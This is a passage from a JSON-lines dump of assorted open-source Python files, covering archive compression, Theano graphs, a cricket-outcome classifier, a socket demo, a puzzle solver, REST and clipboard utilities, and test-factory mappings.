os.listdir(input_path)\n    if not os.path.exists(output_path):\n        os.mkdir(output_path)\n    for i in range(len(dirs)):\n        command = 'HaoZipC a -t7z \"../{2}/{0}(内层).7z\" \"../{1}/{0}\" -mhe=on -mmt=on'\\\n            .format(dirs[i], input_path, output_path)\n        command2 = 'HaoZipC a -t7z -p\"{0}\" \"../{2}/{1}.7z\" \"../{2}/{1}(内层).7z\" -mhe=on -mmt=on' \\\n            .format(file_pw, dirs[i], output_path)\n        # the HaoZipC compressor must be present in the same directory\n        subprocess.run(command, shell=True, cwd=\"./HaoZip\")\n        subprocess.run(command2, shell=True, cwd=\"./HaoZip\")\n        os.remove('./{1}/{0}(内层).7z'.format(dirs[i], output_path))\n\n\ndef main():\n    print('version: '+version)\n    get_pw()\n    get_files()\n    input('按任意键退出')\n\n\nif __name__ == '__main__':\n    try:\n        main()\n    except Exception as e:\n        traceback.print_exc()\n        
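# --- Illustrative aside (not part of the original script) ---
# A hedged sketch of the double-compression idea used above: pack the file
# into an inner archive first, then wrap that archive in a password-protected
# outer one with header encryption (-mhe=on) so even the inner file name is
# hidden. Shown with the standard 7z command line rather than HaoZipC; the
# paths and flags assume an ordinary 7-Zip installation.
import os
import subprocess

def double_compress(src_path, out_dir, password):
    name = os.path.basename(src_path)
    inner = os.path.join(out_dir, name + '.inner.7z')
    outer = os.path.join(out_dir, name + '.7z')
    subprocess.run(['7z', 'a', '-t7z', inner, src_path], check=True)
    subprocess.run(['7z', 'a', '-t7z', '-p' + password, '-mhe=on', outer, inner],
                   check=True)
    os.remove(inner)  # keep only the encrypted outer archive
    return outer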
input('按任意键退出')\n","sub_path":"auto_7z.py","file_name":"auto_7z.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"72033433","text":"\"\"\"Annotated computation graph management.\"\"\"\nimport logging\n\nimport theano\nfrom theano import Variable\nfrom theano.tensor.shared_randomstreams import RandomStreams\n\nfrom blocks.utils import is_graph_input\n\nlogger = logging.getLogger(__name__)\n\n\nclass ComputationGraph(object):\n    \"\"\"Encapsulates a managed Theano computation graph.\n\n    Parameters\n    ----------\n    outputs : list of Theano variables\n        The outputs of the computation graph.\n\n    Attributes\n    ----------\n    inputs : list of Theano variables\n        The inputs of the computation graph.\n    outputs : list of Theano variables\n        The outputs of the computation graph.\n\n    \"\"\"\n    def __init__(self, outputs):\n        if isinstance(outputs, Variable):\n            outputs = [outputs]\n        self.outputs = outputs\n        self._get_variables()\n\n    def _get_variables(self):\n        self.variables = set()\n        self.applies = set()\n        self.application_calls = set()\n        self.updates = []\n\n        def recursion(current):\n            self.variables.add(current)\n\n            if hasattr(current.tag, 'application_call'):\n                logger.debug(\"found application call of {}\".format(current))\n                application_call = current.tag.application_call\n                if application_call not in self.application_calls:\n                    self.application_calls.add(application_call)\n                    for av in application_call.auxiliary_variables:\n                        av.tag.application_call = current.tag.application_call\n                        recursion(av)\n                    self.updates.extend(application_call.updates)\n            if current.owner:\n                owner = current.owner\n                if owner not in self.applies:\n                    if hasattr(owner.tag, 'updates'):\n                        logger.debug(\"found updates in application of {}\"\n                                     .format(owner))\n                        self.updates.extend(owner.tag.updates.items())\n                    self.applies.add(owner)\n                for input_ in owner.inputs:\n                    if input_ not in self.variables:\n                        recursion(input_)\n\n        for output in self.outputs:\n            if output not in self.variables:\n                recursion(output)\n        self.inputs = [v for v in self.variables if is_graph_input(v)]\n\n    def dict_of_inputs(self):\n        \"\"\"Return a mapping from an input name to the input.\"\"\"\n        return {var.name: var for var in self.inputs}\n\n    def replace(self, replacements):\n        \"\"\"Replace certain variables in the computation graph.\n\n        Parameters\n        ----------\n        replacements : dict\n            The mapping from variables to be replaced to the corresponding\n            substitutes.\n\n        \"\"\"\n        return ComputationGraph(theano.clone(self.outputs,\n                                             replace=replacements))\n\n    def get_theano_function(self):\n        \"\"\"Create Theano function from the graph contained.\"\"\"\n        return theano.function(self.inputs, self.outputs,\n                               updates=self.updates)\n\n\ndef apply_noise(graph, variables, level, rng=None):\n    \"\"\"Add Gaussian noise to certain variables of a computation graph.\n\n    Parameters\n    ----------\n    graph : instance of :class:`ComputationGraph`\n        The computation graph.\n    variables : Theano variables\n        Variables to add noise to.\n    level : float\n        Noise level.\n    rng : Theano random stream, optional\n        The random stream to use. 
By default an RNG with seed equal to 1 is\n        used.\n\n    \"\"\"\n    if not rng:\n        rng = RandomStreams(1)\n    replace = {}\n    for variable in variables:\n        replace[variable] = (variable +\n                             rng.normal(variable.shape, std=level))\n    return graph.replace(replace)\n","sub_path":"blocks/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"220220252","text":"# coding: utf-8\n\nfrom __future__ import unicode_literals\nfrom schema import EnumList\n\nTextFormatID = EnumList('TextFormatID','tz::u8',[\n    ('DEBUG_TEXT', 'デバッグ'),\n    ('DEBUG_HIGHLIGHT', 'デバッグハイライト'),\n])\n\nTextID = EnumList('TextID', 'tz::u32',\n    ['TEXT_{0:02d}'.format(i) for i in xrange(1,3)] +\n    ['TEXT2_{0:02d}'.format(i) for i in xrange(1,4)]\n)\n","sub_path":"sample/assets/data/text_def.py","file_name":"text_def.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"350271603","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 27 23:52:27 2019\n\n@author: me\n\"\"\"\n\n\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n# Required Data\ndata = pd.read_csv(\"Data_Training.csv\")\ndata.dropna(inplace=True)\ndata_2019 = pd.read_csv(\"Data_Testing_2019.csv\")\ndata_2019.drop(columns=[\"Unnamed: 0\"], inplace=True)\n\nx = data.drop(columns=[\"Output\", \"Unnamed: 0\", \"match_url\"])\ny = data.Output\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=64)\nx_2019 = data_2019.drop(columns=[\"Match\", \"Team1\", \"Team2\"])\n\n\nfrom sklearn.naive_bayes import GaussianNB\n\n# Create a Gaussian Classifier\nclf = GaussianNB()\n\n# Train the model using the training sets\nclf.fit(x_train,y_train)\n\n# Predict Output\ny_pred = clf.predict(x_test) \n\n\nfrom sklearn import metrics\n# Model Accuracy, how often is the classifier correct?\nprint(\"Accuracy:\",metrics.accuracy_score(y_test, y_pred))\n\n\nprediction_2019 = clf.predict(x_2019)\ndata_2019[\"Result\"] = prediction_2019\n\ndef winner(x):\n    if x.Result == 1:\n        x[\"Winning_Team\"] = x.Team1\n    else:\n        x[\"Winning_Team\"] = x.Team2\n    return x\n\ndef winner_two_teams(team1,team2,x):\n    x=x[(x[\"Team1\"]==team1) & (x[\"Team2\"]==team2) | (x[\"Team1\"]==team2) & (x[\"Team2\"]==team1)]\n    \n    x=x.apply(winner,axis=1)\n    return x\n\n\n\ndata_2019_final = data_2019.apply(winner, axis= 1)\nresults_2019 = data_2019_final.groupby(\"Winning_Team\").size()\nresults_2019 = results_2019.sort_values(ascending=False)\nprint(results_2019)\nprint(data_2019)\nprint(winner_two_teams(\"India\",\"Pakistan\",data_2019))","sub_path":"naive_bayes.py","file_name":"naive_bayes.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"379305783","text":"\"\"\"\n@Project :20180810\n@Time :2018/8/10 10:57\n@Author :Zhenxian\n@File :client_demo.py\n@Software :PyCharm\n\"\"\"\nimport socket\n\nsk = socket.socket()  # create the client socket\nsk.connect(('127.0.0.1', 8898))  # try to connect to the server\nsk.send(b'hello!')\nret = sk.recv(1024)  # dialogue (send/receive)\nprint(ret)\nsk.close()  # close the client socket\n","sub_path":"20180810/client_demo.py","file_name":"client_demo.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"55478403","text":"'''\n206. 
Reverse Linked List\n\nReverse a singly linked list.\n'''\n# Definition for singly-linked list.\n# class ListNode(object):\n#     def __init__(self, x):\n#         self.val = x\n#         self.next = None\n\nclass Solution(object):\n    def reverseList(self, head):\n        \"\"\"\n        :type head: ListNode\n        :rtype: ListNode\n        56 ms\n        \"\"\"\n        dummy = ListNode(0)\n        \n        curr = head\n        while curr is not None: \n            # 1-> 2 ->3 -> 4 -> 5\n            # dummy->1\n            # dummy -> 2\n            temp = dummy.next\n            dummy.next = curr \n            curr = curr.next\n            dummy.next.next = temp\n\n        return dummy.next","sub_path":"206_reverse_linkedlist.py","file_name":"206_reverse_linkedlist.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"19367242","text":"#!/usr/bin/env python3\n\n# -------------\n# FactorialT.py\n# -------------\n\nfrom math import factorial\nfrom timeit import timeit\nfrom unittest import main, TestCase\n\nfrom Factorial import \\\n    factorial_range_for, \\\n    factorial_range_reduce, \\\n    factorial_recursion, \\\n    factorial_tail_recursion, \\\n    factorial_while\n\nclass MyUnitTests (TestCase) :\n    def setUp (self) :\n        self.a = [\n            factorial_recursion,\n            factorial_tail_recursion,\n            factorial_while,\n            factorial_range_for,\n            factorial_range_reduce,\n            factorial]\n\n    def test_0 (self) :\n        for f in self.a :\n            with self.subTest() :\n                self.assertEqual(f(0), 1)\n\n    def test_1 (self) :\n        for f in self.a :\n            with self.subTest() :\n                self.assertEqual(f(1), 1)\n\n    def test_2 (self) :\n        for f in self.a :\n            with self.subTest() :\n                self.assertEqual(f(2), 2)\n\n    def test_3 (self) :\n        for f in self.a :\n            with self.subTest() :\n                self.assertEqual(f(3), 6)\n\n    def test_4 (self) :\n        for f in self.a :\n            with self.subTest() :\n                self.assertEqual(f(4), 24)\n\n    def test_5 (self) :\n        for f in self.a :\n            with self.subTest() :\n                self.assertEqual(f(5), 120)\n\n    def test_6 (self) :\n        for f in self.a :\n            with self.subTest() :\n                print()\n                print(f.__name__)\n                t = timeit(f.__name__ + \"(100)\", \"from __main__ import \" + f.__name__, number = 1000)\n                print(\"{:.2f} milliseconds\".format(t * 1000))\n                print()\n\nif __name__ == \"__main__\" :\n    main()\n\n\"\"\"\n% FactorialT.py\n......\nfactorial_recursion\n20.83 milliseconds\n\n\nfactorial_tail_recursion\n26.73 milliseconds\n\n\nfactorial_while\n14.54 milliseconds\n\n\nfactorial_range_for\n9.07 milliseconds\n\n\nfactorial_range_reduce\n8.36 milliseconds\n\n\nfactorial\n0.94 milliseconds\n\n.\n----------------------------------------------------------------------\nRan 7 tests in 0.089s\n\nOK\n\"\"\"\n","sub_path":"exercises/FactorialT.py","file_name":"FactorialT.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"573019803","text":"#-*-coding:utf-8-*-\nimport pybullet as p\nimport time\nimport pybullet_data\n\n# connect to the GUI\nphysicsClient = p.connect(p.GUI)\n\n# gravitational acceleration\np.setGravity(0, 0, -9.8)\n\n# load pybullet's built-in models\np.setAdditionalSearchPath(pybullet_data.getDataPath())\n\np.setTimeStep(1/200)\n\n\n\ncubeStartPos = [0, 0, 1]\ncubeStartOrientation = p.getQuaternionFromEuler([0, 0, 0])\nwheel_indices = [0,1,2,3]\nhinge_indicies = [0,2]\n\n\nplaneID = p.loadURDF(\"plane.urdf\")\ncarID = p.loadURDF(\"./simplecar.urdf\", cubeStartPos, cubeStartOrientation)\nnumber_of_joints=p.getNumJoints(carID)\n\n\nangle = p.addUserDebugParameter(\"Steering\",-0.5,0.5,0)  # slider in the debug window\nthrottle = 
p.addUserDebugParameter(\"Throttle\",0,20,0)\nfor i in range(10000):\n    # ----- code here\n\n    user_angle = p.readUserDebugParameter(angle)\n    user_throttle = p.readUserDebugParameter(throttle)\n\n    for joint_index in wheel_indices:\n        p.setJointMotorControl2(carID, joint_index,\n                                p.VELOCITY_CONTROL,\n                                targetVelocity=user_throttle)\n    # ----- code end\n    p.stepSimulation()  # render once after applying the commands.\n    time.sleep(1 / 200)\n\np.disconnect(physicsClient)","sub_path":"PybulletTutorialPart1/PybulletTutorialPart1.py","file_name":"PybulletTutorialPart1.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"599322011","text":"# Copyright (C) 2019 Google Inc.\n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>\n\n\"\"\"RBAC Factories for ggrc models.\"\"\"\n\nfrom integration.ggrc.access_control.rbac_factories import (audit, assessment,\n                                                            document, review,\n                                                            assessment_template,  # noqa: E501\n                                                            snapshot, issue,\n                                                            program, workflow,\n                                                            task_group,\n                                                            task_group_task,\n                                                            cycle,\n                                                            cycle_task_group,\n                                                            cycle_task,\n                                                            cycle_task_entry,\n                                                            evidence,\n                                                            universal_factory)\n\n\nTEST_FACTORIES_MAPPING = {\n    \"Audit\": audit.AuditRBACFactory,\n    \"Assessment\": assessment.AssessmentRBACFactory,\n    \"AssessmentTemplate\": assessment_template.AssessmentTemplateRBACFactory,\n    \"Snapshot\": snapshot.SnapshotRBACFactory,\n    \"Issue\": issue.IssueRBACFactory,\n    \"Evidence\": evidence.EvidenceRBACFactory,\n    \"Document\": document.DocumentReferenceUrlRBACFactory,\n    \"Program\": program.ProgramRBACFactory,\n    \"MappedReview\": review.MappedReviewRBACFactory,\n    \"Workflow\": workflow.WorkflowRBACFactory,\n    \"TaskGroup\": task_group.TaskGroupRBACFactory,\n    \"TaskGroupTask\": task_group_task.TaskGroupTaskRBACFactory,\n    \"Cycle\": cycle.CycleRBACFactory,\n    \"CycleTaskGroup\": cycle_task_group.CycleTaskGroupRBACFactory,\n    \"CycleTask\": cycle_task.CycleTaskRBACFactory,\n    \"CycleTaskEntry\": cycle_task_entry.CycleTaskEntryRBACFactory,\n    \"Universal\": universal_factory.UniversalRBACFactory\n}\n","sub_path":"test/integration/ggrc/access_control/rbac_factories/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"340208759","text":"# Pyperclip v1.3\n# A cross-platform clipboard module for Python. (only handles plain text for now)\n# By Al Sweigart al@coffeeghost.net\n\n# Usage:\n#   import pyperclip\n#   pyperclip.copy('The text to be copied to the clipboard.')\n#   spam = pyperclip.paste()\n\n# On Mac, this module makes use of the pbcopy and pbpaste commands, which should come with the os.\n# On Linux, this module makes use of the xclip command, which should come with the os. 
Otherwise run \"sudo apt-get install xclip\"\n\n\n# Copyright (c) 2010, Albert Sweigart\n# All rights reserved.\n#\n# BSD-style license:\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the pyperclip nor the\n# names of its contributors may be used to endorse or promote products\n# derived from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY Albert Sweigart \"AS IS\" AND ANY\n# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL Albert Sweigart BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n# Change Log:\n# 1.2 Use the platform module to help determine OS.\n# 1.3 Changed ctypes.windll.user32.OpenClipboard(None) to ctypes.windll.user32.OpenClipboard(0), after some people ran into some TypeError\n\nimport platform, os, time\n\nclass PyClipboard(object):\n \"\"\"docstring for Clipboard\"\"\"\n def __init__(self):\n self.detect_os()\n self.read = self.os_clipboard.read\n self.write = self.os_clipboard.write\n\n def watch(self):\n pass\n\n def detect_os(self):\n if os.name == 'nt' or platform.system() == 'Windows':\n self.set_os_windows()\n elif os.name == 'mac' or platform.system() == 'Darwin':\n self.set_os_mac()\n elif os.name == 'posix' or platform.system() == 'Linux':\n self.set_os_linux()\n\n def set_os_windows(self):\n import ctypes\n from WindowsClipboard import WindowsClipboard\n self.os_clipboard = WindowsClipboard()\n\n def set_os_mac(self):\n from MacClipboard import MacClipboard\n self.os_clipboard = MacClipboard()\n\n def set_os_linux(self):\n xclipExists = os.system('which xclip') == 0\n if xclipExists:\n self.read = xclipGetClipboard\n self.write = xclipSetClipboard\n else:\n xselExists = os.system('which xsel') == 0\n if xselExists:\n self.read = xselGetClipboard\n self.write = xselSetClipboard\n try:\n import gtk\n self.read = gtkGetClipboard\n self.write = gtkSetClipboard\n except:\n try:\n import PyQt4.QtCore\n import PyQt4.QtGui\n app = QApplication([])\n cb = PyQt4.QtGui.QApplication.clipboard()\n self.read = qtGetClipboard\n self.write = qtSetClipboard\n except:\n raise Exception('Pyperclip requires the gtk or PyQt4 module installed, or the xclip command.')","sub_path":"PyClipboard.py","file_name":"PyClipboard.py","file_ext":"py","file_size_in_byte":3764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"45705138","text":"#!/usr/bin/env python\n\"\"\"\napi/rest_organization.py\n\nCopyright 2021 Triple Dot Engineering LLC\n\nDefines the RestOrg class used to 
interact with organizations via the API.\n\"\"\"\nimport json\nfrom .. import util\nfrom ._abc_rest_obj import RestObject\nfrom .api import TriviumApi\n\n\nclass RestOrg(RestObject):\n    \"\"\"Class for interacting with Orgs via REST api\"\"\"\n\n    ##\n    # RestOrg constructor\n    ##\n    def __init__(self, data):\n        super().__init__()\n        self._data = data\n\n    ##\n    # Returns the string representation of an organization\n    ##\n    def __repr__(self):\n        return self.__str__()\n\n    ##\n    # Returns the string representation of an organization\n    ##\n    def __str__(self):\n        return json.dumps(self._data, indent=4)\n\n\n    ##\n    # Takes a list of organizations as input and prints them in tabular format.\n    ##\n    @staticmethod\n    def print_table(orgs):\n        \"\"\"Prints in tabular format.\"\"\"\n        fmt = '{id:20s} {name:32s}'\n        labels = {\n            'id': 'ID',\n            'name': 'Name'\n        }\n        header_fmt = util.Colors.CYAN + util.Colors.BOLD\n        print(header_fmt + fmt.format(**labels) + util.Colors.ENDC)\n\n        for org in orgs:\n            print(fmt.format(**org))\n\n\n    ##\n    # Gets a single org if the org id is provided, otherwise gets all orgs\n    # that the user has access to.\n    ##\n    @staticmethod\n    def get(org=None):\n        \"\"\"Gets one or more orgs\"\"\"\n        url = '/orgs' if org is None else '/orgs/{}'.format(org)\n        r = TriviumApi().make_request(url)\n        if r.status_code == 200:\n            return r.json()\n\n        # If not 200, raise exception\n        raise Exception('TriviumApiError: {} {}'.format(r.status_code, r.text))\n\n\n    ##\n    # Posts an organization based on the input data.\n    ##\n    @staticmethod\n    def post(data):\n        \"\"\"Posts an org\"\"\"\n        opts = {\n            'method': 'POST',\n            'params': {},\n            'body': data\n        }\n        r = TriviumApi().make_request('/orgs', **opts)\n        if r.status_code == 200:\n            return r.json()\n        raise Exception('TriviumApiError: {} {}'.format(r.status_code, r.text))\n\n\n    ##\n    # Deletes an organization.\n    ##\n    @staticmethod\n    def delete(identifier):\n        \"\"\"Deletes orgs\"\"\"\n        opts = {\n            'method': 'DELETE',\n            'params': {}\n        }\n        url = '/orgs/{0}'.format(identifier)\n        r = TriviumApi().make_request(url, **opts)\n        if r.status_code == 200:\n            return r.json()\n\n        # if not 200\n        raise Exception('TriviumApiError: {} {}'.format(r.status_code, r.text))\n\n    ##\n    # Patches organization(s)\n    ##\n    @staticmethod\n    def patch(data):\n        \"\"\"Patches orgs\"\"\"\n        opts = {\n            'method': 'PATCH',\n            'params': {},\n            'body': data\n        }\n        r = TriviumApi().make_request('/orgs', **opts)\n        if r.status_code == 200:\n            return r.json()\n        # if not 200\n        raise Exception('TriviumApiError: {} {}'.format(r.status_code, r.text))\n","sub_path":"trivium/api/rest_organization.py","file_name":"rest_organization.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"482789952","text":"#Daniel Edwards 4/9/2014\n\nfrom collections import deque\n\nclass BadMoveException (Exception):\n    \n    def __init__(self, expr, msg):\n        self.expr = expr\n        self.msg = msg\n    \n    def __str__(self):\n        error = \"Your error occurred with input \" + self.expr + \"\\n\" + self.msg\n        return error\n\n\nclass PuzzleState (object):\n    '''\nAbstracts a sliding puzzle with one gap. Internally stored as a flattened\nlist called 'gamestate', with the gap represented as None.\n\nFor details, see: https://github.com/rfdickerson/CS241/tree/master/A5\n'''\n\n    def __init__(self, dimensions, gamestate, parent, lastMove):\n        self.dimensions = dimensions\n        self.gamestate = gamestate\n        self.parent = parent\n        self.lastMove = lastMove\n        \n        i = 0\n        while i < len(self.gamestate):\n            if gamestate[i] == None:\n                self.nullIndex = i\n            i += 1\n        \n\n
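    # The helper methods below convert between (x, y) grid coordinates and flat gamestate indices.\n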
    def coordToIndex(self, coord):\n        '''Given an (x, y) tuple, return the index in the gamestate list\ncorresponding to the tile at (x, y). Coordinates are zero-indexed.'''\n        x = coord[0]\n        y = coord[1]\n        \n        row_index = y * self.dimensions[1]\n        index = row_index + x\n        \n        return index\n\n    def indexToCoord(self, index):\n        '''Given a tile index into gamestate list, return the (x, y) tuple\ncorresponding to that tile. Coordinates are zero-indexed.'''\n        y = index // self.dimensions[1]\n        x = index % self.dimensions[1]\n        \n        return (x, y)\n\n    def moveDown(self):\n        '''Returns a new instance of PuzzleState where the gap and the value\nbelow it are flipped.'''\n        gameChange = self.gamestate[:]\n        tileBelowX = self.nullIndex + self.dimensions[1]\n        if tileBelowX < len(self.gamestate):\n            if tileBelowX != None:\n                gameChange[self.nullIndex] = self.gamestate[tileBelowX]\n                gameChange[tileBelowX] = None\n                newState = PuzzleState(self.dimensions, gameChange, self, 'Down')\n                return newState\n\n        raise BadMoveException('Down', 'Illegal Move Operation')\n\n    def moveUp(self):\n        '''Returns a new instance of PuzzleState where the gap and the value\nabove it are flipped.'''\n        gameChange = self.gamestate[:]\n        tileAboveX = self.nullIndex - self.dimensions[1]\n        # A negative index would wrap around in Python, so check the lower bound here.\n        if tileAboveX >= 0:\n            if tileAboveX != None:\n                gameChange[self.nullIndex] = self.gamestate[tileAboveX]\n                gameChange[tileAboveX] = None\n                newState = PuzzleState(self.dimensions, gameChange, self, 'Up')\n                return newState\n        \n        raise BadMoveException('Up', 'Illegal Move Operation')\n        \n\n    def moveRight(self):\n        '''Returns a new instance of PuzzleState where the gap and the value\nto its right are flipped.'''\n        gameChange = self.gamestate[:]\n        tileRightX = self.nullIndex + 1\n        if (tileRightX % self.dimensions[1]) > (self.nullIndex % self.dimensions[1]):\n            if tileRightX != None:\n                gameChange[self.nullIndex] = self.gamestate[tileRightX]\n                gameChange[tileRightX] = None\n                newState = PuzzleState(self.dimensions, gameChange, self, 'Right')\n                return newState\n        \n        raise BadMoveException('Right', 'Illegal Move Operation')\n\n    def moveLeft(self):\n        '''Returns a new instance of PuzzleState where the gap and the value\nto its left are flipped.'''\n        gameChange = self.gamestate[:]\n        tileLeftX = self.nullIndex - 1\n        if (tileLeftX % self.dimensions[1]) < (self.nullIndex % self.dimensions[1]):\n            if tileLeftX != None:\n                gameChange[self.nullIndex] = self.gamestate[tileLeftX]\n                gameChange[tileLeftX] = None\n                newState = PuzzleState(self.dimensions, gameChange, self, 'Left')\n                return newState\n\n        raise BadMoveException('Left', 'Illegal Move Operation')\n\n    def __str__(self):\n        '''Returns a string giving a human-readable representation of the\npuzzle's state.'''\n        string = ''\n        count = 0\n        for item in self.gamestate:\n            if count == self.dimensions[0]:\n                count = 0\n                string = string + '\\n'\n            if item != None:\n                string = string + \" \" + str(item)\n            else:\n                string = string + \" N\"\n            count += 1\n        \n        return string\n\n    def __eq__(self, other):\n        '''Tests whether two PuzzleState instances have the same gamestates.'''\n        if self.gamestate == 
other.gamestate:\n return True\n else:\n return False\n\n\nclass PuzzleSolver (object):\n '''Takes two instances of PuzzleState, an initial and final state, and\ndetermines the solution and some statistics to the problem.\n\nFor details, see: https://github.com/rfdickerson/CS241/tree/master/A5'''\n\n def __init__(self, initial, goal):\n assert initial.dimensions == goal.dimensions, \"initial and goal dimensions must be the same\"\n self.initial = initial\n self.goal = goal\n\n def solve(self):\n '''Solves the puzzle and returns a list of the PuzzleStates used to get\nfrom the initial state to the goal state. The 0th element of the list\nshould be the initial state stored at self.initial, and the last\nelement of the list should be the goal state stored at self.goal.\nTips! (er, requirements...)\n- Use deque from the collections module to keep track of pending\nstates, that is, parents whose children need finding. Use append and\npopleft to push and pop items, respectively.\n- Keep track of states you've already found so you don't move back and\nforth between the same states forever. A Python list is fine here.\n- Keeping track of parents and moves in the constructor of the\nPuzzleState class means you don't need to do any weird additional\nlinking stuff to keep track of the solution. It's already done!'''\n solutionSet = []\n visitedStates = []\n pendingStates = deque()\n currentState = self.initial\n count = 0\n while currentState != self.goal:\n try:\n sUp = currentState.moveUp()\n if sUp not in visitedStates:\n pendingStates.append(sUp)\n except BadMoveException:\n pass\n \n try:\n sDown = currentState.moveDown()\n if sDown not in visitedStates:\n pendingStates.append(sDown)\n except BadMoveException:\n pass\n \n try:\n sLeft = currentState.moveLeft()\n if sLeft not in visitedStates:\n pendingStates.append(sLeft)\n except BadMoveException:\n pass\n \n try:\n sRight = currentState.moveRight()\n if sRight not in visitedStates:\n pendingStates.append(sRight)\n except BadMoveException:\n pass\n \n visitedStates.append(currentState)\n currentState = pendingStates.popleft()\n if self.goal in pendingStates:\n while currentState is not self.goal:\n if currentState == self.goal:\n break\n currentState = pendingStates.popleft()\n if currentState == self.goal:\n break\n \n runner = currentState\n \n while runner != self.initial:\n solutionSet.append(runner)\n runner = runner.parent\n if runner == self.initial:\n break\n \n solutionSet.append(runner)\n solutionSet = solutionSet[::-1]\n return solutionSet\n\n def movesToSolve(self):\n '''Returns a list of strings (in English) representing the directions\nto move the blank space in order to solve the puzzle. 
Depends on the\nsolve method, above.'''\n\n        solution = self.solve()\n\n        # [1:] slicing omits the lastMove of the initial state, which is None\n        return [ state.lastMove for state in solution[1:] ]\n\n\nif __name__ == \"__main__\":\n    dimensions = (3, 3)\n    parent = lastMove = None\n    initial = PuzzleState(dimensions, [2,8,3,1,6,4,7,None,5], parent, lastMove)\n    goal = PuzzleState(dimensions, [None,2,3,1,8,6,7,5,4], parent, lastMove)\n\n    solver = PuzzleSolver(initial, goal)\n    soln = solver.solve()","sub_path":"A5/slidingpuzzle.py","file_name":"slidingpuzzle.py","file_ext":"py","file_size_in_byte":8558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"534169871","text":"\"\"\"\nConvert a .txt file of Chinese and English stop words into a .csv file.\n\"\"\"\nimport codecs\nimport pandas as pd\n\n\nclass stopWords:\n    def __init__(self, path, savePath):\n        self.path = path\n        self.savePath = savePath\n\n    def dealFunc(self):\n        data = codecs.open(self.path, 'r', encoding='utf-8')\n        line = data.readline()\n        result = list()\n        while line:\n            result.append(str(line.strip()))\n            line = data.readline()\n\n        result = pd.DataFrame({'stopWords': list(set(result))})\n        result.fillna(\" \", inplace=True)\n        result.to_csv(self.savePath, index=None)\n\n\nif __name__ == '__main__':\n    path = './data/stopWord.txt'\n    savePath = './data/stopWord.csv'\n    stopWords(path, savePath).dealFunc()","sub_path":"stopWords.py","file_name":"stopWords.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"599322011","text":"# Copyright (C) 2019 Google Inc.\n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>.\n\n\"\"\"RBAC Factories for ggrc models.\"\"\"\n\nfrom integration.ggrc.access_control.rbac_factories import (audit, assessment,\n                                                            document, review,\n                                                            assessment_template,  # noqa: E501\n                                                            snapshot, issue,\n                                                            program, workflow,\n                                                            task_group,\n                                                            task_group_task,\n                                                            cycle,\n                                                            cycle_task_group,\n                                                            cycle_task,\n                                                            cycle_task_entry,\n                                                            evidence,\n                                                            universal_factory)\n\n\nTEST_FACTORIES_MAPPING = {\n    \"Audit\": audit.AuditRBACFactory,\n    \"Assessment\": assessment.AssessmentRBACFactory,\n    \"AssessmentTemplate\": assessment_template.AssessmentTemplateRBACFactory,\n    \"Snapshot\": snapshot.SnapshotRBACFactory,\n    \"Issue\": issue.IssueRBACFactory,\n    \"Evidence\": evidence.EvidenceRBACFactory,\n    \"Document\": document.DocumentReferenceUrlRBACFactory,\n    \"Program\": program.ProgramRBACFactory,\n    \"MappedReview\": review.MappedReviewRBACFactory,\n    \"Workflow\": workflow.WorkflowRBACFactory,\n    \"TaskGroup\": task_group.TaskGroupRBACFactory,\n    \"TaskGroupTask\": 